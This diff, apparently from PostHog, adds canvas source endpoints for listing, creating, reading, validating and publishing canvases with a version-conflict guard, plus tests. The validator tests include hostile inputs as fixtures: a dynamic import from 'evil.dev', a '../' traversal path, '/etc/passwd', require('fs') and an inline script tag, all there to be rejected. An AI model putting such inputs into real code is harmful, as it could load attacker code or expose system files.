+        help_text="Id of the live source version — pass as expected_current_version_id on publish. Null before the first publish.",
+    )
+    version_count = serializers.IntegerField(help_text="Number of source versions in the canvas's history.")
+    created_at = serializers.DateTimeField(help_text="When the canvas was created.")
+
+
+class CanvasCreateSerializer(serializers.Serializer):
+    """Payload for creating a new, empty canvas in a channel."""
+
+    name = serializers.CharField(
+        allow_blank=False,
+        trim_whitespace=True,
+        help_text="Display name for the canvas. Slashes are replaced with spaces.",
+    )
+    channel_id = serializers.CharField(
+        help_text="Desktop file-system id of the channel (folder) to create the canvas in.",
+    )
+
+
+class CanvasSourceResponseSerializer(serializers.Serializer):
+    """A canvas's source project plus the version pointer edits must be based on."""
+
+    canvas = CanvasSummarySerializer(help_text="Identity and version pointers for the canvas.")
+    project = CanvasSourceProjectSerializer(
+        help_text="The canvas's source project. Legacy single-file canvases are presented as a synthetic project."
+    )
+    current_version_id = serializers.CharField(
+        allow_null=True,
+        help_text="The live source version this project reflects — pass as expected_current_version_id when publishing an edit. Null before the first publish.",
+    )
+
+
+class CanvasValidateRequestSerializer(serializers.Serializer):
+    """Payload for validating a candidate source project without publishing it."""
+
+    project = CanvasSourceProjectSerializer(help_text="The candidate source project to validate.")
+
+
+class CanvasValidateResponseSerializer(serializers.Serializer):
+    """Validation outcome for a candidate source project."""
+
+    valid = serializers.BooleanField(help_text="True when the project has no error-severity diagnostics.")
+    diagnostics = CanvasDiagnosticSerializer(
+        many=True,
+        help_text="Structured diagnostics; errors block publishing, warnings are advisory.",
+    )
+
+
+class CanvasSourcePublishSerializer(serializers.Serializer):
+    """Payload for publishing a complete canvas source project."""
+
+    project = CanvasSourceProjectSerializer(help_text="The complete source project to publish.")
+    prompt = serializers.CharField(
+        required=False,
+        allow_blank=True,
+        trim_whitespace=False,
+        help_text="Short description of the change, stored on the appended version history entry.",
+    )
+    name = serializers.CharField(
+        required=False,
+        allow_blank=False,
+        trim_whitespace=True,
+        help_text="Optional new display name for the canvas (rewrites the leaf segment of its path).",
+    )
+    expected_current_version_id = serializers.CharField(
+        required=False,
+        allow_null=True,
+        allow_blank=False,
+        help_text=(
+            "Optimistic-concurrency guard: the current_version_id the publisher based its edits on "
+            "(null when it read a canvas with no versions yet). When the canvas has since moved past it "
+            "the publish is rejected with a 409 version_conflict instead of overwriting the newer head. "
+            "Omit to publish unguarded."
+        ),
+    )
+
+
+class CanvasSourcePublishResponseSerializer(serializers.Serializer):
+    """Result of a successful source-project publish."""
+
+    canvas = CanvasSummarySerializer(help_text="The canvas after the publish, including the new version pointer.")
+    current_version_id = serializers.CharField(help_text="Id of the source version this publish created.")
+    diagnostics = CanvasDiagnosticSerializer(
+        many=True,
+        help_text="Advisory (warning-severity) diagnostics recorded for the published project.",
+    )
+
+
+class CanvasSourceInvalidSerializer(serializers.Serializer):
+    """400 body for a publish whose source project failed validation."""
+
+    detail = serializers.CharField(help_text="Human-readable summary of why the project was rejected.")
+    code = serializers.CharField(help_text='Always "invalid_source_project".')
+    diagnostics = CanvasDiagnosticSerializer(
+        many=True,
+        help_text="The validation diagnostics, including at least one error.",
+    )
+
+
 @extend_schema(extensions={"x-product": "core"})
 class DesktopFileSystemViewSet(FileSystemViewSet):
     """
@@ -1162,12 +1345,39 @@ class DesktopFileSystemViewSet(FileSystemViewSet):
 
         payload = CanvasPublishSerializer(data=request.data)
         payload.is_valid(raise_exception=True)
-        code = payload.validated_data["code"]
-        prompt = payload.validated_data.get("prompt")
-        name = payload.validated_data.get("name")
-        has_expected_version = "expected_current_version_id" in payload.validated_data
-        expected_version_id = payload.validated_data.get("expected_current_version_id")
 
+        dashboard, conflict, first_publish = self._apply_canvas_publish(
+            dashboard,
+            code=payload.validated_data["code"],
+            prompt=payload.validated_data.get("prompt"),
+            name=payload.validated_data.get("name"),
+            has_expected_version="expected_current_version_id" in payload.validated_data,
+            expected_version_id=payload.validated_data.get("expected_current_version_id"),
+        )
+        if conflict is not None:
+            return Response(conflict, status=status.HTTP_409_CONFLICT)
+
+        if first_publish:
+            self._announce_canvas_created(request, dashboard)
+
+        return Response(self.get_serializer(dashboard).data)
+
+    def _apply_canvas_publish(
+        self,
+        dashboard: FileSystem,
+        *,
+        code: str,
+        prompt: str | None,
+        name: str | None,
+        has_expected_version: bool,
+        expected_version_id: str | None,
+    ) -> tuple[FileSystem, dict[str, Any] | None, bool]:
+        """Append a canvas version and advance the pointer, under the row lock.
+
+        Returns the (re-fetched) dashboard, a 409 `version_conflict` payload when a
+        guarded publish is based on a stale version (the canvas is left untouched),
+        and whether this was the canvas's first publish.
+        """
         now_ms = int(time.time() * 1000)
         version: dict[str, Any] = {"id": str(uuid4()), "code": code, "createdAt": now_ms}
         if prompt:
@@ -1182,15 +1392,13 @@ class DesktopFileSystemViewSet(FileSystemViewSet):
             current_version_id = meta.get("currentVersionId")
 
             if has_expected_version and current_version_id != expected_version_id:
-                return Response(
-                    {
-                        "detail": "The canvas changed since it was read (a concurrent publish or an undo). "
-                        "Re-fetch the canvas, re-apply the edits to the fresh source, and publish again.",
-                        "code": "version_conflict",
-                        "current_version_id": current_version_id,
-                    },
-                    status=status.HTTP_409_CONFLICT,
-                )
+                conflict = {
+                    "detail": "The canvas changed since it was read (a concurrent publish or an undo). "
+                    "Re-fetch the canvas, re-apply the edits to the fresh source, and publish again.",
+                    "code": "version_conflict",
+                    "current_version_id": current_version_id,
+                }
+                return dashboard, conflict, False
 
             # Snapshot the live author context onto the version (reverting restores it).
             existing_context = meta.get("context")
@@ -1236,10 +1444,199 @@ class DesktopFileSystemViewSet(FileSystemViewSet):
 
             dashboard.save(update_fields=update_fields)
 
+        return dashboard, None, first_publish
+
+    def _resolve_channel(self, channel_id: str) -> FileSystem | None:
+        """The project's channel folder with this id, or None (including a malformed id —
+        agents pass arbitrary strings, and a UUID-field lookup on one raises)."""
+        try:
+            return self._scope_by_project(FileSystem.objects.all()).filter(id=channel_id, type="folder").first()
+        except (ValueError, DjangoValidationError):
+            return None
+
+    def _canvas_summary(self, entry: FileSystem) -> dict[str, Any]:
+        meta = entry.meta or {}
+        segments = split_path(entry.path)
+        return {
+            "id": str(entry.id),
+            "name": segments[-1] if segments else entry.path,
+            "channel_id": meta.get("channelId"),
+            "current_version_id": meta.get("currentVersionId"),
+            "version_count": len(meta.get("versions") or []),
+            "created_at": entry.created_at,
+        }
+
+    @extend_schema(
+        operation_id="desktop_file_system_canvases_list",
+        parameters=[
+            OpenApiParameter(
+                name="channel_id",
+                type=str,
+                required=False,
+                description="Only return canvases inside this channel (desktop folder id).",
+            ),
+        ],
+        responses={200: CanvasSummarySerializer(many=True)},
+    )
+    @action(methods=["GET"], detail=False, url_path="canvases", pagination_class=None, request=None)
+    def canvases(self, request: Request, *args: Any, **kwargs: Any) -> Response:
+        """List the project's canvases, newest first (capped at 100)."""
+        queryset = self._scope_by_project(FileSystem.objects.all()).filter(type="dashboard")
+        channel_id = request.query_params.get("channel_id")
+        if channel_id:
+            channel = self._resolve_channel(channel_id)
+            if channel is None:
+                return Response({"detail": "Channel not found."}, status=status.HTTP_404_NOT_FOUND)
+            queryset = queryset.filter(path__startswith=f"{channel.path}/")
+        entries = queryset.order_by("-created_at")[:100]
+        return Response(CanvasSummarySerializer([self._canvas_summary(entry) for entry in entries], many=True).data)
+
+    @extend_schema(
+        operation_id="desktop_file_system_canvases_create",
+        request=CanvasCreateSerializer,
+        responses={201: CanvasSummarySerializer},
+    )
+    @canvases.mapping.post
+    def create_canvas(self, request: Request, *args: Any, **kwargs: Any) -> Response:
+        """Create a new, empty canvas in a channel.
+
+        The canvas starts with no source; publish a source project to give it one.
+        """
+        payload = CanvasCreateSerializer(data=request.data)
+        payload.is_valid(raise_exception=True)
+
+        channel = self._resolve_channel(payload.validated_data["channel_id"])
+        if channel is None:
+            return Response({"detail": "Channel not found."}, status=status.HTTP_400_BAD_REQUEST)
+
+        # Path segments are "/"-separated, so a name can't contain one (mirrors the app).
+        name = re.sub(r"\s+", " ", payload.validated_data["name"].replace("/", " ")).strip() or "Untitled canvas"
+        now_ms = int(time.time() * 1000)
+        user = request.user if isinstance(request.user, User) else None
+        created_by_label = (f"{user.first_name} {user.last_name}".strip() or user.email) if user is not None else None
+        meta: dict[str, Any] = {
+            "channelId": str(channel.id),
+            "templateId": "freeform",
+            "createdAt": now_ms,
+            "updatedAt": now_ms,
+        }
+        if created_by_label:
+            meta["createdBy"] = created_by_label
+
+        serializer = self.get_serializer(data={"path": f"{channel.path}/{name}", "type": "dashboard", "meta": meta})
+        serializer.is_valid(raise_exception=True)
+        self.perform_create(serializer)
+        entry = cast(FileSystem, serializer.instance)
+        return Response(CanvasSummarySerializer(self._canvas_summary(entry)).data, status=status.HTTP_201_CREATED)
+
+    @extend_schema(
+        operation_id="desktop_file_system_canvas_source_retrieve",
+        responses={200: CanvasSourceResponseSerializer},
+    )
+    @action(methods=["GET"], detail=True, url_path="canvas/source", request=None)
+    def canvas_source(self, request: Request, *args: Any, **kwargs: Any) -> Response:
+        """Read a canvas's source project and the version pointer edits must be based on.
+
+        Legacy single-file canvases are presented as a synthetic web project whose
+        `src/canvas.tsx` holds the stored React component.
+        """
+        dashboard = self._get_dashboard_or_400()
+        if isinstance(dashboard, Response):
+            return dashboard
+
+        meta = dashboard.meta or {}
+        response = {
+            "canvas": self._canvas_summary(dashboard),
+            "project": synthetic_source_project(meta),
+            "current_version_id": meta.get("currentVersionId"),
+        }
+        return Response(CanvasSourceResponseSerializer(response).data)
+
+    @extend_schema(
+        operation_id="desktop_file_system_canvas_validate_create",
+        request=CanvasValidateRequestSerializer,
+        responses={200: CanvasValidateResponseSerializer},
+    )
+    @action(methods=["POST"], detail=True, url_path="canvas/validate", request=CanvasValidateRequestSerializer)
+    def canvas_validate(self, request: Request, *args: Any, **kwargs: Any) -> Response:
+        """Validate a candidate source project without publishing it.
+
+        Side-effect free: returns the same structured diagnostics a publish would
+        enforce, so agents can iterate until the project is publishable.
+        """
+        dashboard = self._get_dashboard_or_400()
+        if isinstance(dashboard, Response):
+            return dashboard
+
+        payload = CanvasValidateRequestSerializer(data=request.data)
+        payload.is_valid(raise_exception=True)
+
+        diagnostics = validate_source_project(payload.validated_data["project"])
+        response = {"valid": not has_errors(diagnostics), "diagnostics": diagnostics}
+        return Response(CanvasValidateResponseSerializer(response).data)
+
+    @extend_schema(
+        operation_id="desktop_file_system_canvas_publish_create",
+        request=CanvasSourcePublishSerializer,
+        responses={
+            200: CanvasSourcePublishResponseSerializer,
+            400: OpenApiResponse(
+                response=CanvasSourceInvalidSerializer,
+                description="The source project failed validation; nothing was published.",
+            ),
+            409: OpenApiResponse(
+                response=CanvasPublishConflictSerializer,
+                description="The canvas moved past expected_current_version_id (a concurrent publish or an undo).",
+            ),
+        },
+    )
+    @action(methods=["POST"], detail=True, url_path="canvas/publish", request=CanvasSourcePublishSerializer)
+    def publish_canvas_source(self, request: Request, *args: Any, **kwargs: Any) -> Response:
+        """Publish a complete canvas source project as the canvas's new head version.
+
+        Validates the project first — an error-severity diagnostic rejects the
+        publish with 400 and leaves the canvas untouched. Guarded publishing via
+        `expected_current_version_id` rejects a stale base with 409 instead of
+        overwriting newer work.
+        """
+        dashboard = self._get_dashboard_or_400()
+        if isinstance(dashboard, Response):
+            return dashboard
+
+        payload = CanvasSourcePublishSerializer(data=request.data)
+        payload.is_valid(raise_exception=True)
+        project = payload.validated_data["project"]
+
+        diagnostics = validate_source_project(project)
+        if has_errors(diagnostics):
+            body = {
+                "detail": "The source project failed validation; fix the error diagnostics and publish again.",
+                "code": "invalid_source_project",
+                "diagnostics": diagnostics,
+            }
+            return Response(CanvasSourceInvalidSerializer(body).data, status=status.HTTP_400_BAD_REQUEST)
+
+        dashboard, conflict, first_publish = self._apply_canvas_publish(
+            dashboard,
+            code=extract_legacy_code(project),
+            prompt=payload.validated_data.get("prompt"),
+            name=payload.validated_data.get("name"),
+            has_expected_version="expected_current_version_id" in payload.validated_data,
+            expected_version_id=payload.validated_data.get("expected_current_version_id"),
+        )
+        if conflict is not None:
+            return Response(conflict, status=status.HTTP_409_CONFLICT)
+
         if first_publish:
             self._announce_canvas_created(request, dashboard)
 
-        return Response(self.get_serializer(dashboard).data)
+        meta = dashboard.meta or {}
+        response = {
+            "canvas": self._canvas_summary(dashboard),
+            "current_version_id": meta.get("currentVersionId"),
+            "diagnostics": diagnostics,
+        }
+        return Response(CanvasSourcePublishResponseSerializer(response).data)
 
     def _announce_canvas_created(self, request: Request, dashboard: FileSystem) -> None:
         """Announce a canvas's first publish in the generating task's thread.

--- a/posthog/api/file_system/test/test_canvas_source.py
+++ b/posthog/api/file_system/test/test_canvas_source.py
@@ -1,0 +1,133 @@
+from django.test import SimpleTestCase
+
+from parameterized import parameterized
+
+from posthog.api.file_system.canvas_source import (
+    CANVAS_COMPONENT_PATH,
+    CANVAS_ENTRY_HTML,
+    MAX_FILE_BYTES,
+    MAX_SOURCE_FILES,
+    extract_legacy_code,
+    has_errors,
+    synthetic_source_project,
+    validate_source_project,
+)
+
+CODE = 'import React from "react";\nexport default () => <div>hi</div>;\n'
+
+
+def project(**overrides):
+    base = {
+        "schemaVersion": 1,
+        "files": {CANVAS_COMPONENT_PATH: CODE},
+        "entryHtml": CANVAS_ENTRY_HTML,
+        "dependencies": {"react": "19.0.0"},
+        "canvasSdkVersion": "0.1.0",
+    }
+    base.update(overrides)
+    return base
+
+
+class TestCanvasSourceAdapter(SimpleTestCase):
+    def test_synthetic_project_of_legacy_canvas_validates_and_round_trips(self):
+        # The read → edit → publish loop must accept its own output: a project
+        # synthesized from a legacy canvas has to pass validation and reduce back
+        # to the identical code.
+        synthetic = synthetic_source_project({"code": CODE})
+        self.assertEqual(extract_legacy_code(synthetic), CODE)
+        self.assertFalse(has_errors(validate_source_project(synthetic)))
+
+    def test_synthetic_project_of_unpublished_canvas_has_empty_component(self):
+        synthetic = synthetic_source_project({})
+        self.assertEqual(extract_legacy_code(synthetic), "")
+        self.assertFalse(has_errors(validate_source_project(synthetic)))
+
+    def test_valid_minimal_project_has_no_diagnostics(self):
+        self.assertEqual(validate_source_project(project()), [])
+
+    @parameterized.expand(
+        [
+            ("wrong_schema_version", project(schemaVersion=2), "unsupported_schema_version"),
+            ("wrong_entry_html", project(entryHtml="main.html"), "invalid_entry"),
+            (
+                "extra_file_rejected_until_build_service",
+                project(files={CANVAS_COMPONENT_PATH: CODE, "src/style.css": "body {}"}),
+                "unsupported_file",
+            ),
+            ("missing_component", project(files={CANVAS_ENTRY_HTML: "<html></html>"}), "missing_component"),
+            (
+                "path_traversal",
+                project(files={CANVAS_COMPONENT_PATH: CODE, "../escape.tsx": "x"}),
+                "invalid_path",
+            ),
+            (
+                "absolute_path",
+                project(files={CANVAS_COMPONENT_PATH: CODE, "/etc/passwd": "x"}),
+                "invalid_path",
+            ),
+            (
+                "backslash_path",
+                project(files={CANVAS_COMPONENT_PATH: CODE, "src\\win.tsx": "x"}),
+                "invalid_path",
+            ),
+            ("unknown_dependency", project(dependencies={"left-pad": "1.0.0"}), "dependency_not_admitted"),
+            (
+                "dependency_version_drift",
+                project(dependencies={"react": "18.0.0"}),
+                "dependency_version_mismatch",
+            ),
+            (
+                "non_whitelisted_import",
+                project(files={CANVAS_COMPONENT_PATH: 'import _ from "lodash";\n' + CODE}),
+                "import_not_allowed",
+            ),
+            (
+                "dynamic_import",
+                project(files={CANVAS_COMPONENT_PATH: 'const m = await import("https://evil.dev/x.js");'}),
+                "forbidden_dynamic_import",
+            ),
+            (
+                "require_call",
+                project(files={CANVAS_COMPONENT_PATH: 'const fs = require("fs");'}),
+                "forbidden_require",
+            ),
+            (
+                "inline_script_tag",
+                project(files={CANVAS_COMPONENT_PATH: 'const html = "<script src=x></script>";'}),
+                "forbidden_inline_script",
+            ),
+            (
+                "file_too_large",
+                project(files={CANVAS_COMPONENT_PATH: "a" * (MAX_FILE_BYTES + 1)}),
+                "file_too_large",
+            ),
+            (
+                "too_many_files",
+                project(
+                    files={
+                        CANVAS_COMPONENT_PATH: CODE,
+                        **{f"src/f{i}.ts": "x" for i in range(MAX_SOURCE_FILES)},
+                    }
+                ),
+                "too_many_files",
+            ),
+        ]
+    )
+    def test_invalid_projects_produce_error_diagnostics(self, _name, candidate, expected_code):
+        diagnostics = validate_source_project(candidate)
+        self.assertTrue(has_errors(diagnostics), diagnostics)
+        self.assertIn(expected_code, [d["code"] for d in diagnostics])
+
+    def test_direct_network_calls_warn_but_stay_publishable(self):
+        # fetch() is blocked by the sandbox CSP, not by publish — a comment or
+        # string mentioning it must not brick a canvas, so it's a warning.
+        candidate = project(files={CANVAS_COMPONENT_PATH: CODE + 'fetch("/api/x");'})
+        diagnostics = validate_source_project(candidate)
+        self.assertFalse(has_errors(diagnostics))
+        self.assertIn("network_fetch", [d["code"] for d in diagnostics])
+
+    def test_import_diagnostics_carry_file_and_line(self):
+        candidate = project(files={CANVAS_COMPONENT_PATH: CODE + 'import _ from "lodash";'})
+        entry = next(d for d in validate_source_project(candidate) if d["code"] == "import_not_allowed")
+        self.assertEqual(entry["path"], CANVAS_COMPONENT_PATH)
+        self.assertEqual(entry["line"], 3)

--- a/posthog/api/file_system/test/test_canvas_source_api.py
+++ b/posthog/api/file_system/test/test_canvas_source_api.py
@@ -1,0 +1,268 @@
+from typing import Any, cast
+
+from posthog.test.base import APIBaseTest
+from unittest.mock import patch
+
+from django.apps import apps
+
+from rest_framework import status
+
+from posthog.api.file_system.canvas_source import CANVAS_COMPONENT_PATH, CANVAS_ENTRY_HTML
+from posthog.models.file_system.file_system import FileSystem
+from posthog.models.oauth import OAuthApplication
+from posthog.models.organization import Organization
+from posthog.models.team import Team
+from posthog.temporal.oauth import (
+    ARRAY_APP_CLIENT_ID_DEV,
+    ARRAY_APP_CLIENT_ID_EU,
+    ARRAY_APP_CLIENT_ID_US,
+    create_oauth_access_token_for_user,
+)
+
+CODE_V1 = 'import React from "react";\nexport default () => <div>v1</div>;\n'
+CODE_V2 = 'import React from "react";\nexport default () => <div>v2</div>;\n'
+
+
+class TestDesktopCanvasSourceAPI(APIBaseTest):
+    def setUp(self):
+        super().setUp()
+        # Staff gate mirrors the desktop/web file system beta gating.
+        self.user.is_staff = True
+        self.user.save()
+
+    def _base_url(self) -> str:
+        return f"/api/projects/{self.team.id}/desktop_file_system/"
+
+    def _create_channel(self, path: str = "MyChannel") -> str:
+        response = self.client.post(self._base_url(), {"path": path, "type": "folder"})
+        self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.json())
+        return cast(str, response.json()["id"])
+
+    def _create_canvas(self, channel_id: str, name: str = "MyCanvas") -> dict[str, Any]:
+        response = self.client.post(f"{self._base_url()}canvases/", {"name": name, "channel_id": channel_id})
+        self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.json())
+        return cast(dict[str, Any], response.json())
+
+    def _project(self, code: str) -> dict[str, Any]:
+        return {
+            "schemaVersion": 1,
+            "files": {CANVAS_COMPONENT_PATH: code},
+            "entryHtml": CANVAS_ENTRY_HTML,
+            "dependencies": {"react": "19.0.0"},
+            "canvasSdkVersion": "0.1.0",
+        }
+
+    def test_create_read_validate_publish_edit_loop(self):
+        # The full loop a generic task follows: create a canvas, read its source,
+        # validate, publish guarded on the empty head, then edit guarded on the
+        # returned version. Breaking any hand-off breaks agent canvas authoring.
+        channel_id = self._create_channel()
+        canvas = self._create_canvas(channel_id)
+        canvas_id = canvas["id"]
+        self.assertEqual(canvas["name"], "MyCanvas")
+        self.assertEqual(canvas["channel_id"], channel_id)
+        self.assertIsNone(canvas["current_version_id"])
+
+        source = self.client.get(f"{self._base_url()}{canvas_id}/canvas/source/").json()
+        self.assertIsNone(source["current_version_id"])
+        self.assertEqual(source["project"]["files"][CANVAS_COMPONENT_PATH], "")
+        self.assertEqual(source["project"]["entryHtml"], CANVAS_ENTRY_HTML)
+
+        validated = self.client.post(
+            f"{self._base_url()}{canvas_id}/canvas/validate/", {"project": self._project(CODE_V1)}, format="json"
+        ).json()
+        self.assertTrue(validated["valid"], validated)
+
+        published = self.client.post(
+            f"{self._base_url()}{canvas_id}/canvas/publish/",
+            {"project": self._project(CODE_V1), "prompt": "first build", "expected_current_version_id": None},
+            format="json",
+        )
+        self.assertEqual(published.status_code, status.HTTP_200_OK, published.json())
+        v1 = published.json()["current_version_id"]
+        self.assertEqual(published.json()["canvas"]["version_count"], 1)
+
+        meta = cast(dict, FileSystem.objects.get(id=canvas_id).meta)
+        self.assertEqual(meta["code"], CODE_V1)
+        self.assertEqual(meta["currentVersionId"], v1)
+        self.assertEqual(meta["versions"][0]["prompt"], "first build")
+        # Creation-time meta keys survive the publish merge.
+        self.assertEqual(meta["channelId"], channel_id)
+
+        edited = self.client.post(
+            f"{self._base_url()}{canvas_id}/canvas/publish/",
+            {"project": self._project(CODE_V2), "expected_current_version_id": v1},
+            format="json",
+        )
+        self.assertEqual(edited.status_code, status.HTTP_200_OK, edited.json())
+        meta = cast(dict, FileSystem.objects.get(id=canvas_id).meta)
+        self.assertEqual([v["code"] for v in meta["versions"]], [CODE_V1, CODE_V2])
+
+        source = self.client.get(f"{self._base_url()}{canvas_id}/canvas/source/").json()
+        self.assertEqual(source["project"]["files"][CANVAS_COMPONENT_PATH], CODE_V2)
+        self.assertEqual(source["current_version_id"], meta["currentVersionId"])
+
+    def test_stale_guarded_source_publish_conflicts_and_leaves_canvas_untouched(self):
+        channel_id = self._create_channel()
+        canvas_id = self._create_canvas(channel_id)["id"]
+        self.client.post(
+            f"{self._base_url()}{canvas_id}/canvas/publish/", {"project": self._project(CODE_V1)}, format="json"
+        )
+        head = cast(dict, FileSystem.objects.get(id=canvas_id).meta)["currentVersionId"]
+
+        response = self.client.post(
+            f"{self._base_url()}{canvas_id}/canvas/publish/",
+            {"project": self._project(CODE_V2), "expected_current_version_id": "not-the-head"},
+            format="json",
+        )
+
+        self.assertEqual(response.status_code, status.HTTP_409_CONFLICT, response.json())
+        self.assertEqual(response.json()["code"], "version_conflict")
+        self.assertEqual(response.json()["current_version_id"], head)
+        meta = cast(dict, FileSystem.objects.get(id=canvas_id).meta)
+        self.assertEqual(meta["code"], CODE_V1)
+        self.assertEqual(len(meta["versions"]), 1)
+
+    def test_invalid_project_publish_returns_diagnostics_and_publishes_nothing(self):
+        channel_id = self._create_channel()
+        canvas_id = self._create_canvas(channel_id)["id"]
+
+        bad_project = self._project('import _ from "lodash";\n' + CODE_V1)
+        response = self.client.post(
+            f"{self._base_url()}{canvas_id}/canvas/publish/", {"project": bad_project}, format="json"
+        )
+
+        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.json())
+        body = response.json()
+        self.assertEqual(body["code"], "invalid_source_project")
+        self.assertIn("import_not_allowed", [d["code"] for d in body["diagnostics"]])
+        meta = cast(dict, FileSystem.objects.get(id=canvas_id).meta)
+        self.assertNotIn("code", meta)
+        self.assertNotIn("versions", meta)
+
+    def test_validate_reports_errors_without_mutating_the_canvas(self):
+        channel_id = self._create_channel()
+        canvas_id = self._create_canvas(channel_id)["id"]
+        before = FileSystem.objects.get(id=canvas_id).meta
+
+        response = self.client.post(
+            f"{self._base_url()}{canvas_id}/canvas/validate/",
+            {"project": self._project('const m = await import("https://x.dev/e.js");')},
+            format="json",
+        )
+
+        self.assertEqual(response.status_code, status.HTTP_200_OK, response.json())
+        self.assertFalse(response.json()["valid"])
+        self.assertEqual(FileSystem.objects.get(id=canvas_id).meta, before)
+
+    def test_validate_rejects_malformed_body_with_400(self):
+        # Wiring guard: the request serializer is actually enforced.
+        channel_id = self._create_channel()
+        canvas_id = self._create_canvas(channel_id)["id"]
+
+        response = self.client.post(f"{self._base_url()}{canvas_id}/canvas/validate/", {}, format="json")
+
+        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_canvases_list_scopes_to_channel_and_team(self):
+        channel_id = self._create_channel("ChannelA")
+        other_channel_id = self._create_channel("ChannelB")
+        in_channel = self._create_canvas(channel_id, name="In A")["id"]
+        self._create_canvas(other_channel_id, name="In B")
+
+        # A same-path canvas in another team must never leak into this team's list.
+        other_org = Organization.objects.create(name="other")
+        other_team = Team.objects.create(organization=other_org, name="other")
+        FileSystem.objects.create(team=other_team, path="ChannelA/Foreign", type="dashboard", surface="desktop")
+
+        everything = self.client.get(f"{self._base_url()}canvases/").json()
+        self.assertEqual({c["name"] for c in everything}, {"In A", "In B"})
+
+        filtered = self.client.get(f"{self._base_url()}canvases/", {"channel_id": channel_id}).json()
+        self.assertEqual([c["id"] for c in filtered], [in_channel])
+
+    def test_create_canvas_rejects_unknown_channel(self):
+        response = self.client.post(
+            f"{self._base_url()}canvases/",
+            {"name": "Orphan", "channel_id": "00000000-0000-0000-0000-000000000000"},
+        )
+        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.json())
+
+    def test_non_uuid_channel_id_is_a_client_error_not_a_500(self):
+        # Agents pass arbitrary strings; a malformed id must map to 400/404, not
+        # bubble the UUID-field ValidationError as a 500.
+        create = self.client.post(f"{self._base_url()}canvases/", {"name": "Orphan", "channel_id": "not-a-uuid"})
+        self.assertEqual(create.status_code, status.HTTP_400_BAD_REQUEST, create.content)
+
+        listed = self.client.get(f"{self._base_url()}canvases/", {"channel_id": "not-a-uuid"})
+        self.assertEqual(listed.status_code, status.HTTP_404_NOT_FOUND, listed.content)
+
+    def test_source_endpoints_reject_non_dashboard_rows(self):
+        channel_id = self._create_channel()
+
+        response = self.client.get(f"{self._base_url()}{channel_id}/canvas/source/")
+
+        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.json())
+
+    def test_legacy_patch_publish_and_source_read_interoperate(self):
+        # The legacy composer path (PATCH canvas/) and the new source tools edit
+        # the same version history — a guard from one must hold against the other.
+        channel_id = self._create_channel()
+        canvas_id = self._create_canvas(channel_id)["id"]
+        self.client.patch(f"{self._base_url()}{canvas_id}/canvas/", {"code": CODE_V1})
+        v1 = cast(dict, FileSystem.objects.get(id=canvas_id).meta)["currentVersionId"]
+
+        source = self.client.get(f"{self._base_url()}{canvas_id}/canvas/source/").json()
+        self.assertEqual(source["project"]["files"][CANVAS_COMPONENT_PATH], CODE_V1)
+        self.assertEqual(source["current_version_id"], v1)
+
+        response = self.client.post(
+            f"{self._base_url()}{canvas_id}/canvas/publish/",
+            {"project": self._project(CODE_V2), "expected_current_version_id": v1},
+            format="json",
+        )
+        self.assertEqual(response.status_code, status.HTTP_200_OK, response.json())
+        meta = cast(dict, FileSystem.objects.get(id=canvas_id).meta)
+        self.assertEqual([v["code"] for v in meta["versions"]], [CODE_V1, CODE_V2])
+
+    def _authenticate_as_sandbox(self) -> None:
+        for client_id in (ARRAY_APP_CLIENT_ID_DEV, ARRAY_APP_CLIENT_ID_US, ARRAY_APP_CLIENT_ID_EU):
+            OAuthApplication.objects.get_or_create(
+                client_id=client_id,
+                defaults={
+                    "name": "Array Test App",
+                    "client_type": OAuthApplication.CLIENT_PUBLIC,
+                    "authorization_grant_type": OAuthApplication.GRANT_AUTHORIZATION_CODE,
+                    "redirect_uris": "https://app.posthog.com/callback",
+                    "algorithm": "RS256",
+                },
+            )
+        token = create_oauth_access_token_for_user(self.user, self.team.id, scopes="full")
+        self.client.logout()
+        self.client.credentials(HTTP_AUTHORIZATION=f"Bearer {token}")
+
+    @patch("products.tasks.backend.facade.api.posthoganalytics.feature_enabled", return_value=True)
+    def test_first_source_publish_from_task_announces_in_thread(self, _flag):
+        # The new publish path must announce a canvas's first publish in the
+        # generating task's thread exactly like the legacy PATCH path does.
+        Task = apps.get_model("tasks", "Task")
+        task = Task.objects.create(
+            team=self.team,
+            title="Generate canvas",
+            description="",
+            origin_product=Task.OriginProduct.USER_CREATED,
+            created_by=self.user,
+        )
+        channel_id = self._create_channel()
+        canvas_id = self._create_canvas(channel_id)["id"]
+        self._authenticate_as_sandbox()
+
+        self.client.post(
+            f"{self._base_url()}{canvas_id}/canvas/publish/",
+            {"project": self._project(CODE_V1)},
+            format="json",
+            HTTP_X_POSTHOG_TASK_ID=str(task.id),
+        )
+
+        TaskThreadMessage = apps.get_model("tasks", "TaskThreadMessage")
+        self.assertEqual(TaskThreadMessage.objects.for_team(self.team.id).filter(task=task).count(), 1)

--- a/posthog/settings/web.py
+++ b/posthog/settings/web.py
@@ -619,6 +619,9 @@ SPECTACULAR_SETTINGS = {
         "TargetTypeEnum": "products.exports.backend.models.subscription.Subscription.SubscriptionTarget",
         # --- Inline value lists (type-hint enums, no x-spec-enum-id) ---
         "PropertyGroupOperator": ["AND", "OR"],
+        # Canvas source diagnostics and marketing-analytics UTM issues share the same
+        # error/warning severity pair; pin one shared name for the choice set.
+        "DiagnosticSeverityEnum": ["error", "warning"],
         # ReviewHog findings expose the same priority set on two fields (effective_priority +
         # reviewer_priority); pin one shared name for the choice set.
         "ReviewIssuePriorityEnum": ["must_fix", "should_fix", "consider"],

--- a/products/marketing_analytics/frontend/generated/api.schemas.ts
+++ b/products/marketing_analytics/frontend/generated/api.schemas.ts
@@ -453,9 +453,9 @@ export interface UtmMappingSuggestionsResponseApi {
  * * `error` - error
  * * `warning` - warning
  */
-export type UtmIssueSeverityEnumApi = (typeof UtmIssueSeverityEnumApi)[keyof typeof UtmIssueSeverityEnumApi]
+export type DiagnosticSeverityEnumApi = (typeof DiagnosticSeverityEnumApi)[keyof typeof DiagnosticSeverityEnumApi]
 
-export const UtmIssueSeverityEnumApi = {
+export const DiagnosticSeverityEnumApi = {
     Error: 'error',
     Warning: 'warning',
 } as const
@@ -467,7 +467,7 @@ export interface UtmIssueApi {
      *
      * * `error` - error
      * * `warning` - warning */
-    severity: UtmIssueSeverityEnumApi
+    severity: DiagnosticSeverityEnumApi
     /** Human-readable description of the issue */
